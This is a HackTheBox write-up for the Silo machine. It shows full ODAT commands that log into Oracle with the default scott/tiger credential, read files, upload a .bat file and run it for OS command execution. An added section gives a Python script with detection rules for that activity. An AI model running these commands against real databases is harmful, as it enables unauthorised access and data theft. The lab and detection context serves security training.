Silo Box Writeup & Walkthrough – [HTB] – HackTheBox

Introduction

Silo is a machine on HackTheBox.

Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. It contains several challenges that are constantly updated.

This article shows how to compromise the Silo box and retrieve user.txt and root.txt.

Silo Box

Collection

First, we scan the Silo box for open ports and see whether any of the services are weak.

Silo Scan Ports

There are a lot of ports open. Let’s try them one by one.

Hack the Silo Box

Hack the Silo box http service

An HTTP server is running on this box, so let’s start with this service. Open a browser and visit the website.

Silo HTTP Service

The page is the default IIS page, so I assume this is not the intended path. Just in case, we use dirb to enumerate directories and see what we can find.

Silo dirb

Unfortunately, we did not find anything, so let’s move on to the next service.

Hack ports 135, 139 & 445

For these services, we can use Metasploit. After my testing, however, there is no exploitable vulnerability on them, so the intended path should be the Oracle database.

Hack the Oracle Database

I worked for around 3 years as a database and system administrator, so I know where the weaknesses of a database are. For attacking the Oracle database, we use this tool: ODAT.

You will spend a few hours installing this tool on your Kali Linux, but once it is installed everything is easy. (In this article I will not show how to install it, because there are already plenty of tutorials on that.)

After installing ODAT, the next step is to find which user is using default or weak credentials. This is the list of Oracle default credentials:

Silo Oracle Default Credentials

After testing, we find a working default credential:

Username: scott

Password: tiger

Then, we run this command to read root.txt:

./odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --getFile "c:/Users/Administrator/Desktop" "root.txt" "spz.io" --sysdba

Silo Root

Getting user.txt is a little more difficult. First, we need to write a .bat script that lists the Users folder so we can figure out the username.

We create a new file named 1.bat with the following content:

Silo 1.bat file

Then, we use this command to upload the file and run the script.

./odat.py dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger --putFile "c:/" 1.bat /root/Desktop/1.bat --sysdba

Then, we run the command to list the user folders, and we get the username:

./odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --exec "dir C:/" 1.bat --sysdba

Silo UserName

Ha, we got the username “Phineas”. Now we can run the same kind of command to read user.txt. (The command is the same as the one that read root.txt; just change the location to C:/Users/Phineas/Desktop/user.txt.)

Silo User
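From the defender’s side, the ODAT modules used above rely on a SYSDBA session from a default account, a directory object, an external table (with a PREPROCESSOR clause for --exec) and DBMS_XSLPROCESSOR.CLOB2FILE for the file write, all of which end up in the Oracle audit trail. The following Python script is added here as an example and is not part of the original write-up or of ODAT; it runs simple detection rules over constructed audit records shaped like that activity (the record field names, the statement text and the default-account list are assumptions, not real logs from this box):

```python
import re

# Constructed sample of Oracle audit-trail records (field names modelled on
# unified-audit DBUSERNAME / SYSTEM_PRIVILEGE_USED / SQL_TEXT); not real logs.
SAMPLE_AUDIT = [
    {"user": "HR", "priv": "NONE",
     "sql": "SELECT first_name FROM employees WHERE employee_id = :1"},
    {"user": "SCOTT", "priv": "SYSDBA",
     "sql": "CREATE OR REPLACE DIRECTORY odat_dir AS 'c:/Users/Administrator/Desktop'"},
    {"user": "SCOTT", "priv": "SYSDBA",
     "sql": ("CREATE TABLE odat_ext (line VARCHAR2(4000)) ORGANIZATION EXTERNAL "
             "(TYPE ORACLE_LOADER DEFAULT DIRECTORY odat_dir ACCESS PARAMETERS "
             "(RECORDS DELIMITED BY NEWLINE PREPROCESSOR odat_dir:'1.bat') "
             "LOCATION ('root.txt'))")},
    {"user": "SCOTT", "priv": "SYSDBA",
     "sql": "BEGIN DBMS_XSLPROCESSOR.CLOB2FILE(:1, 'ODAT_DIR', '1.bat'); END;"},
]

# Accounts Oracle ships with well-known passwords (scott/tiger is the one used
# in this write-up); a session from one of them as SYSDBA is a red flag.
DEFAULT_ACCOUNTS = {"SCOTT", "DBSNMP", "OUTLN", "CTXSYS", "MDSYS", "SYSTEM"}

# (rule name, severity, pattern over the statement text)
STATEMENT_RULES = [
    ("directory-object-created", "medium",
     re.compile(r"\bCREATE\s+(OR\s+REPLACE\s+)?DIRECTORY\b", re.I)),
    ("external-table-created", "medium",
     re.compile(r"\bORGANIZATION\s+EXTERNAL\b", re.I)),
    ("external-table-preprocessor", "critical",  # OS command execution path
     re.compile(r"\bPREPROCESSOR\s+\w+\s*:", re.I)),
    ("clob2file-write", "high",  # arbitrary file write on the DB host
     re.compile(r"\bDBMS_XSLPROCESSOR\s*\.\s*CLOB2FILE\b", re.I)),
]

def triage(records):
    """Return one finding dict per rule that matches, in record order."""
    findings = []
    for rec in records:
        user = rec["user"].upper()
        if user in DEFAULT_ACCOUNTS and rec["priv"].upper() in ("SYSDBA", "SYSOPER"):
            findings.append({"user": user, "rule": "default-account-sysdba",
                             "severity": "high"})
        for name, severity, pattern in STATEMENT_RULES:
            if pattern.search(rec["sql"]):
                findings.append({"user": user, "rule": name, "severity": severity})
    return findings

if __name__ == "__main__":
    for f in triage(SAMPLE_AUDIT):
        print(f"[{f['severity']:8}] {f['user']}: {f['rule']}")
```

Locking or re-passwording the default accounts (and not granting them SYSDBA) removes the entry point; the statement rules catch the same technique even when it is driven from a legitimately obtained account.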

Summary

Overall, this box is easy. What you need to do is spend a few hours installing ODAT on your Kali Linux. I spent around 2 hours installing the tool, then 10 minutes rooting the box. The difficulty of this box should be around 5 (4 for installing ODAT + 1 for rooting the box).

Here is my other write-up, of the Aragog box.